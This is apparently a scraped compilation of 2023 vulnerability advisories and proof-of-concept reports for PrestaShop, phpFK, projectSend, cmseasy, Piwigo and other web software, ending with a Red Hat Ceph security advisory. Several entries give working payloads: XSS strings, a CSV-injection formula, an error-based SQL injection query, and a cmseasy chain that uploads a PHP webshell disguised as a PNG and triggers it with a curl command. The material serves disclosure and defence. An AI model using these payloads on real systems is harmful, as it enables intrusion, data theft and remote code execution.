In the PrestaShop < 2.4.3 module "Length, weight or volume sell" (ailinear) there is a SQL injection vulnerability.

In the module “Length, weight or volume sell” (ailinear) for PrestaShop, an attacker can perform SQL injection up to 2.4.3. Release 2.4.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-31672
*   **Published at**: 2023-06-15
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: ailinear
*   **Impacted release**: < 2.4.3 (2.4.3 fixed the vulnerability)
*   **Product author**: ai-dev
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 2.4.3, a sensitive SQL call in file includes/ajax.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted others and more variables.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: low
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data on the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to exposed tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijacked emails

**Patch**

    --- a/ailinear/includes/ajax.php
    +++ b/ailinear/includes/ajax.php
    @@ -346,17 +346,23 @@ if (Tools::getIsset('action')) {
         $request_value = Tools::getIsset('value') ? Tools::getValue('value') : 0;
         $request_product = (int)Tools::getValue('product');
         $request_more = Tools::getValue('more');
    -    $request_others = Tools::getValue('others');
    +    $request_others = (int)Tools::getValue('others');
         $request_quantity = (int)Tools::getValue('qty');
     
         /* Test if base combination exists */
         if ($request_more != '') {
    -        $more = explode('_', $request_more);
    +        $more_attributes = explode('_', $request_more);
    +        $more_attributes = array_map('intval', $more_attributes);
    +        foreach ($more_attributes as $key => $attr) {
    +            if (!$attr) {
    +                unset($more_attributes[$key]);
    +            }
    +        }
             
             /* Get the id_product_attribute (the first is the default one)*/
             $result = DB::getInstance()->ExecuteS(
                 'SELECT COUNT(id_product_attribute) as number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute_combination WHERE id_product_attribute IN (SELECT id_product_attribute FROM '._DB_PREFIX_.'product_attribute WHERE '.
    -            'id_product = '.$request_product.') AND id_attribute IN ('.implode(', ', $more).') GROUP BY id_product_attribute HAVING number = '.count($more).' ORDER BY id_product_attribute ASC'
    +            'id_product = '.$request_product.') AND id_attribute IN ('.implode(', ', $more_attributes).') GROUP BY id_product_attribute HAVING number = '.count($more_attributes).' ORDER BY id_product_attribute ASC'
             );
             
             /* Get the attributes values and lang for the product */
    @@ -364,6 +370,8 @@ if (Tools::getIsset('action')) {
                 die('Unknown');
             }
         } else {
    +        $more_attributes = array();
    +        
             /* Get the id_product_attribute (the first is the default one)*/
             $result = DB::getInstance()->ExecuteS('SELECT COUNT(id_product_attribute) as number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute WHERE id_product = '.$request_product.' ORDER BY id_product_attribute ASC');
         }
    @@ -373,13 +381,6 @@ if (Tools::getIsset('action')) {
             $return = 'Message->'.$module->l('Message for delayed preparation', 'ajax').'|';
         }
     
    -    /* Get attributes */
    -    if ($request_more != '') {
    -        $more_attributes = explode('_', $request_more);
    -    } else {
    -        $more_attributes = array();
    -    }
    -
         /* Get price changes */
         $more_attributes_price = 0;
         if (count($more_attributes)) {
    

**Other recommendations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”)
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-03-08

Vunlnerability found during a audit by 202 ecommerce

2023-03-08

Contact the author

2023-03-08

The author confirm the issue and supply a fixed release

2023-04-23

Request a CVE ID

2023-06-15

Publication of this advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-31672: [CVE-2023-31672] Improper neutralization of an SQL parameter in ailinear module for PrestaShop

Purle Devloper Panel version 1.0 suffers from an insecure direct object reference vulnerability that allows an unauthenticated user to update passwords.

    ====================================================================================================================================| # Title     : Purle Devloper Panel ver 1.0 Unauthorized administrative access Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : http://www.njmweb.we.bs/Purple10/PURPLEV10.zip                                                                     |  | # Dork      : "Purle Devloper Panel"                                                                                             |====================================================================================================================================poc :[+] an unauthenticated access allow you to update password.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /user_update.php[+] https://127.0.0.1/purple.iprebrandsapp/user_update.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Purle Devloper Panel 1.0 Insecure Direct Object Reference

phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

phpFK 8.0 Cross Site Scripting

projectSend version r1605 suffers from a CSV injection vulnerability.

    Exploit Title: projectSend r1605 - CSV injectionVersion: r1605Bugs:  CSV InjectionTechnology: PHPVendor URL: https://www.projectsend.org/Software Link: https://www.projectsend.org/Date of found: 11-06-2023Author: Mirabbas AğalarovTested on: Windows2. Technical Details & POC========================================Step 1. login as userstep 2. Go to My Account ( http://localhost/users-edit.php?id=2 )step 3. Set name as  =calc|a!z|step 3. If admin Export action-log as CSV  file ,in The computer of admin  occurs csv injection and will open calculator ( http://localhost/actions-log.php )payload: =calc|a!z|

projectSend r1605 CSV Injection

projectSend version r1605 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: projectSend r1605 - Stored XSSApplication: projectSendVersion: r1605Bugs:  Stored XssTechnology: PHPVendor URL: https://www.projectsend.org/Software Link: https://www.projectsend.org/Date of found: 11-06-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================1. Login as admin2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)3. Go to new JS (http://localhost/custom-assets-add.php?language=js)4. Set content as  alert("xss"); and set public 5. And Save6. Go to http://localhost (logout)payload: alert("xss")POST /custom-assets-add.php HTTP/1.1Host: localhostContent-Length: 171Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/custom-assets-add.php?language=jsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2lConnection: closecsrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head

projectSend r1605 Cross Site Scripting

An arbitrary file upload vulnerability in the component /api/upload.php of ThinkAdmin v6 allows attackers to execute arbitrary code via a crafted file.

CVE-2023-34833

cmseasy v7.7.7.7 20230520 was discovered to contain a path traversal vulnerability via the add_action method at lib/admin/language_admin.php. This vulnerability allows attackers to execute arbitrary code and perform a local file inclusion.

cmseasy v7.7.7.7 (20230520) path traversal

2023-06-06 14:26:52

**Product**

cmseasy v7.7.7.7 20230520

**Official site**

https://www.cmseasy.cn/

**Exp**

In lib/admin/language_admin.php, the method add_action:

    function add_action() {
        $lang_choice='system.php';
        if (isset($_GET['lang_choice'])){
            $lang_choice=$_GET['lang_choice'];
        }
        if (front::post('submit')) {
            $langid=front::get('id');
            $lang=new lang();
            $langdata = $lang->getrows('id='.$langid, 1);
            if (is_array($langdata)){
                $langurlname=$langdata[0]['langurlname'];
            }else{
                front::alert(lang_admin('language_pack').lang_admin('nonentity'));
            }
    
            $path=ROOT.'/lang/'.$langurlname.'/'.$lang_choice;
            if(file_exists($path)){
                $str= file_get_contents($path);//将整个文件内容读入到一个字符串中
                if(inject_check($str)){
                    exit(lang_admin('文件异常'));
                }
            }
    
            $lang_data = include $path;
            if (is_array($lang_data)){
                $lang_data[front::$post['key']]=front::$post['val'];
                file_put_contents(($path), '<?php return ' . var_export($lang_data, true) . ';');
            }
            
            // ...
        }
        $this->view->lang_choice=$lang_choice;
    }

The variabel $path is controlable by passing query parameter language_choice and there is no filter for ../, which leads to arbitrary local file inclusion.

One can upload a malicious png file via the avatar upload api uploadimage3

    http://localhost:5000/index.php?case=tool&act=uploadimage3

    function uploadimage3_action()
    {
        $res = array();
        $uploads = array();
        if (is_array($_FILES)) {
            $upload = new upload();
            $upload->dir = 'images';
            $upload->max_size = config::get('upload_max_filesize') * 1024 * 1024;
            $_file_type = str_replace(',', '|', config::get('upload_filetype'));
            foreach ($_FILES as $name => $file) {
                $res[$name]['size'] = ceil($file['size'] / 1024);
                if ($file['size'] > $upload->max_size) {
                    $res[$name]['code'] = "1";
                    $res[$name]['msg'] = lang('attachment_exceeding_the_upper_limit') . "(" . ceil($upload->max_size / 1024) . "K)！";
                    break;
                }
                if (!front::checkstr(file_get_contents($file['tmp_name']))) {
                    $res[$name]['code'] = "2";
                    $res[$name]['msg'] = lang('upload_failed_attachment_is_not_verified');
                    break;
                }
                if (!$file['name'] || !preg_match('/\.(' . $_file_type . ')$/', $file['name']))
                    continue;
                $uploads[$name] = $upload->run($file);
                if (!$uploads[$name]) {
                    $res[$name]['code'] = "3";
                    $res[$name]['msg'] = lang('attachment_save_failed');
                    break;
                }
                $str = (config::get('base_url')==""?"":config::get('base_url')) .$uploads[$name];
                $res[$name]['name'] = $str;
                $res[$name]['type'] = $file['type'];
                $res[$name]['code'] = "0";
    
    
                //图片上传  插件
                apps::updateimg($uploads[$name],ROOT.$str);
    
            }
        }
        echo json::encode($res);
    }

Although this method uses front::checkstr to check malformed contents, there is a missing of php short tags.

    static function checkstr($str)
    {
        if (preg_match("/<(\/?)(script|i?frame|style|html|\?php|body|title|link|meta)([^>]*?)>/is", $str, $match)) {
            //front::flash(print_r($match,true));
            return false;
        }
        if (preg_match("/(<[^>]*)on[a-zA-Z]+\s*=([^>]*>)/is", $str, $match)) {
            return false;
        }
        return true;
    }

Hackers can construct a png file with following contents:

    <?= system($_GET['a']); ?>

and obtain the storing path after uploading it.

Just invoke the language adding api and include the malicious image to RCE:

    curl 'http://localhost:5000/index.php?case=language&act=add&admin_dir=admin&id=1&lang_choice=../../cn/upload/images/202306/16856887744033.png&a=whoami' \
      -H 'Cookie: PHPSESSID=mdr3p80arphh454bsffqi2o71g; login_username=admin; login_password=oXtK-mknJjNu%253DaxvRZtfrah7PXdq7bkw9XdbwZ0nPXAaJ2ab18391e6e61e99aff8e10d05e4ad02' \
      -d 'submit=1'

CVE-2023-34880: cmseasy v7.7.7.7 (20230520) path traversal

Cross-site scripting (XSS) vulnerability in Phpgurukul Cyber Cafe Management System 1.0 allows remote attackers to inject arbitrary web script or HTML via the admin username parameter.

    # Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting
    # Date: 04-12-2020
    # Exploit Author: Pruthvi Nekkanti
    # Vendor Homepage: https://phpgurukul.com
    # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
    # Version: 1.0
    # Tested on: Kali Linux
    
    Attack vector:
    This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
    
    Vulnerable Parameters: Admin Username.
    
    Steps-To-Reproduce:
    1. Go to the Product admin panel change the admin username
    2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
    3. Now go to the website and the XSS will be triggered.

CVE-2023-34666: OffSec’s Exploit Database Archive

Piwigo 13.7.0 is vulnerable to SQL Injection via the "Users" function.

Access the 'Users' function and use the filter function  

Observe the request on Burp Suite  

Manipulate the 'order' or 'exclude\[\]' parameter by adding a single quote, and an error in MYSQL shows up, proving the existence of SQL injection  

We can try to retrieve all the databases name with the error-based payload id AND (SELECT 2690 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,51) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) , just increasing the LIMIT value to enumerate all the databases name  

Analyze the vulnerability from the source code, locate the ws\_users\_getList() function (/piwigo/include/ws\_functions/pwg.users.php), notice that 'order' was concat directly after the 'ORDER BY' clause without any kind of input sanitization. The same case happens for  
the 'exclude\[\]' parameter  

This vulnerability affects the latest version up to 13.7.0, and it is uncertain if other versions will be affected.

CVE-2023-34626: SQL Injection in the "Users" function of piwigo · Issue #1924 · Piwigo/Piwigo

A new container image for Red Hat Ceph Storage 6.1 is now available in the Red Hat Ecosystem Catalog.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-42581: A flaw was found in the Ramda NPM package that involves prototype poisoning. This flaw allows attackers to supply a crafted object, affecting the integrity or availability of the application.
* CVE-2022-1650: A flaw was found in the EventSource NPM Package. The description from the source states the following message: "Exposure of Sensitive Information to an Unauthorized Actor." This flaw allows an attacker to steal the user's credentials and then use the credentials to access the legitimate website.
* CVE-2022-1705: A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating "chunked" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.
* CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by reverse proxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This issue could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After the fix, the reverse proxy sanitizes the query parameters in the forwarded query when the outbound request's form field is set after the reverse proxy. The director function returns, indicating that the proxy has parsed the query parameters. Proxies that do not parse query parameters continue to forward the original query parameters unchanged.
* CVE-2022-21680: A vulnerability was found in the markedjs package. Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks, affecting system availability.
* CVE-2022-21681: A vulnerability was found in the markedjs package. Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks, affecting system availability.
* CVE-2022-24675: A buffer overflow flaw was found in Golang's library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB), causing a stack overflow in Decode, which leads to a loss of availability.
* CVE-2022-24785: A path traversal vulnerability was found in Moment.js that impacts npm (server) users. This issue occurs if a user-provided locale string is directly used to switch moment locale, which an attacker can exploit to change the correct path to one of their choice. This can result in a loss of integrity.
* CVE-2022-26148: A flaw was found in Grafana when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right-click to view the source code and use Ctrl-F to search for the password in api_jsonrpc.php to discover the Zabbix account password and URL address.
* CVE-2022-27664: A flaw was found in the golang package. In net/http in Go, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if a fatal error preempts the shutdown.
* CVE-2022-28131: A flaw was found in golang encoding/xml. When calling Decoder, Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.
* CVE-2022-28327: An integer overflow flaw was found in Golang's crypto/elliptic library. This flaw allows an attacker to use a crafted scaler input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.
* CVE-2022-29526: A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file's group, affecting system availability.
* CVE-2022-30629: A flaw was found in the crypto/tls golang package. When session tickets are generated by crypto/tls, it is missing the ticket expiration. This issue may allow an attacker to observe the TLS handshakes to correlate successive connections during session resumption.
* CVE-2022-30630: A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.
* CVE-2022-30631: A flaw was found in golang. Calling the Reader, Read method on an archive that contains a large number of concatenated 0-length compressed files can cause a panic issue due to stack exhaustion.
* CVE-2022-30632: A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.
* CVE-2022-30633: A flaw was found in golang. Calling Unmarshal on an XML document into a Go struct, which has a nested field that uses the "any" field tag, can cause a panic due to stack exhaustion.
* CVE-2022-30635: A flaw was found in golang. When calling Decoder, Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.
* CVE-2022-31097: A Cross-site scripting (XSS) vulnerability was found in the Unified Alerting feature of Grafana. This stored XSS can elevate privileges from Editor to Admin.
* CVE-2022-31107: A flaw was found in Grafana. This flaw allows a malicious user with the authorization to log into a Grafana instance via a configured OAuth IdP to take over an existing Grafana account under certain conditions.
* CVE-2022-31123: A flaw was found in the Grafana web application, where it is possible to install plugins which are not digitally signed. An admin could install unsigned plugins, which may contain malicious code.
* CVE-2022-31130: A flaw was found in Grafana's use of the GitLab data source plugin, leaking the API key to gitlab. This can result in the destination plugin receiving a Grafana user's authentication token, which could be used by an attacker.
* CVE-2022-32148: A flaw was found in net/http/httputil golang package. When httputil.ReverseProxy.ServeHTTP is called with a Request.Header map containing a nil value for the X-Forwarded-For header, ReverseProxy could set the client IP incorrectly. This issue may affect confidentiality.
* CVE-2022-32189: An uncontrolled resource consumption flaw was found in Golang math/big. A too-short encoded message can cause a panic in Float.GobDecode and Rat.GobDecode in math/big in Go, potentially allowing an attacker to create a denial of service, impacting availability.
* CVE-2022-32190: A flaw was found in the golang package. The JoinPath doesn't remove the ../ path components appended to a domain that is not terminated by a slash, possibly leading to a directory traversal attack.
* CVE-2022-35957: A flaw was found in the grafana package. Auth proxy allows authentication of a user by only providing the username (or email) in an X-WEBAUTH-USER HTTP header. The trust assumption is that a front proxy will take care of authentication and that the Grafana server is only publicly reachable with this front proxy.
* CVE-2022-39201: A flaw was found in Grafana. The vulnerability impacts data source and plugin proxy endpoints under certain conditions. Grafana could leak the authentication cookie of users to plugins, which could result in an impact to confidentiality, integrity, and availability.
* CVE-2022-39229: A flaw was found in the Grafana web application. When a user logs into the system, either the username or email address can be used. However, the login system allows both a username and connected email to be registered, which could allow an attacker to prevent a user which has an associated email address access.
* CVE-2022-39306: An authentication bypass flaw was discovered in Grafana. This issue could allow a remote unauthenticated attacker to create an account and provide access to a certain organization, which can be exploited by gaining access to the signup link. The highest impacts to the system are confidentiality and integrity.
* CVE-2022-39307: An information leak was discovered in Grafana. Remote unauthenticated users could exploit the forget password feature to discover which user accounts exist.
* CVE-2022-39324: A flaw was found in the grafana package. While creating a snapshot, an attacker may manipulate a hidden HTTP parameter to inject a malicious URL in the "Open original dashboard" button.
* CVE-2022-41715: A flaw was found in the golang package, where programs that compile regular expressions from untrusted sources are vulnerable to memory exhaustion or a denial of service. The parsed regexp representation is linear in the input size. Still, in some cases, the constant factor can be as high as 40,000, making a relatively small regexp consume larger amounts of memory. After the fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Routine use of regular expressions is unaffected.
* CVE-2022-41912: An authentication bypass flaw was discovered in the crewjam/saml go package. A remote unauthenticated attacker could trigger it by sending a SAML request. This would allow an escalation of privileges and then enable  compromising system integrity.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-06-15

Updated:

2023-06-15

**RHSA-2023:3642 - Security Advisory**

*   Overview
*   Updated Images

**Synopsis**

Important: Red Hat Ceph Storage 6.1 Container security and bug fix update

**Type/Severity**

Security Advisory: Important

**Topic**

A new container image for Red Hat Ceph Storage 6.1 is now available in the Red Hat Ecosystem Catalog.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.  

This new container image is based on Red Hat Ceph Storage 6.1 and Red Hat Enterprise Linux 9.  

Security Fix(es):  

*   crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements (CVE-2022-41912)
*   eventsource: Exposure of Sensitive Information (CVE-2022-1650)
*   grafana: stored XSS vulnerability (CVE-2022-31097)
*   grafana: OAuth account takeover (CVE-2022-31107)
*   ramda: prototype poisoning (CVE-2021-42581)
*   golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
*   golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)
*   marked: regular expression block.def may lead Denial of Service (CVE-2022-21680)
*   marked: regular expression inline.reflinkSearch may lead Denial of Service (CVE-2022-21681)
*   golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)
*   Moment.js: Path traversal in moment.locale (CVE-2022-24785)
*   grafana: An information leak issue was discovered in Grafana through 7.3.4, when integrated with Zabbix (CVE-2022-26148)
*   golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)
*   golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
*   golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)
*   golang: syscall: faccessat checks wrong group (CVE-2022-29526)
*   golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
*   golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
*   golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
*   golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
*   golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
*   grafana: plugin signature bypass (CVE-2022-31123)
*   grafana: data source and plugin proxy endpoints leaking authentication tokens to some destination plugins (CVE-2022-31130)
*   golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
*   golang: net/url: JoinPath does not strip relative path components in all circumstances (CVE-2022-32190)
*   grafana: Escalation from admin to server admin when auth proxy is used (CVE-2022-35957)
*   grafana: Data source and plugin proxy endpoints could leak the authentication cookie to some destination plugins (CVE-2022-39201)
*   grafana: using email as a username can block other users from signing in (CVE-2022-39229)
*   grafana: email addresses and usernames cannot be trusted (CVE-2022-39306)
*   grafana: User enumeration via forget password (CVE-2022-39307)
*   grafana: Spoofing of the originalUrl parameter of snapshots (CVE-2022-39324)
*   golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)
*   golang: crypto/tls: session tickets lack random ticket\_age\_add (CVE-2022-30629)
*   golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service (CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Ceph Storage Release Notes for information on the most significant of these changes:  

https://access.redhat.com/documentation/en-us/red\_hat\_ceph\_storage/6.1/html/release\_notes/index

All users of Red Hat Ceph Storage are advised to pull these new images from the Red Hat Ecosystem catalog, which provides numerous enhancements and bug fixes.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 9 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 9 s390x
*   Red Hat Enterprise Linux for Power, little endian 9 ppc64le

**Fixes**

*   BZ - 2066563 - CVE-2022-26148 grafana: An information leak issue was discovered in Grafana through 7.3.4, when integrated with Zabbix
*   BZ - 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale
*   BZ - 2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode
*   BZ - 2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar
*   BZ - 2082705 - CVE-2022-21680 marked: regular expression block.def may lead Denial of Service
*   BZ - 2082706 - CVE-2022-21681 marked: regular expression inline.reflinkSearch may lead Denial of Service
*   BZ - 2083778 - CVE-2021-42581 ramda: prototype poisoning
*   BZ - 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
*   BZ - 2085307 - CVE-2022-1650 eventsource: Exposure of Sensitive Information
*   BZ - 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket\_age\_add
*   BZ - 2104365 - CVE-2022-31097 grafana: stored XSS vulnerability
*   BZ - 2104367 - CVE-2022-31107 grafana: OAuth account takeover
*   BZ - 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
*   BZ - 2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
*   BZ - 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
*   BZ - 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
*   BZ - 2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
*   BZ - 2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
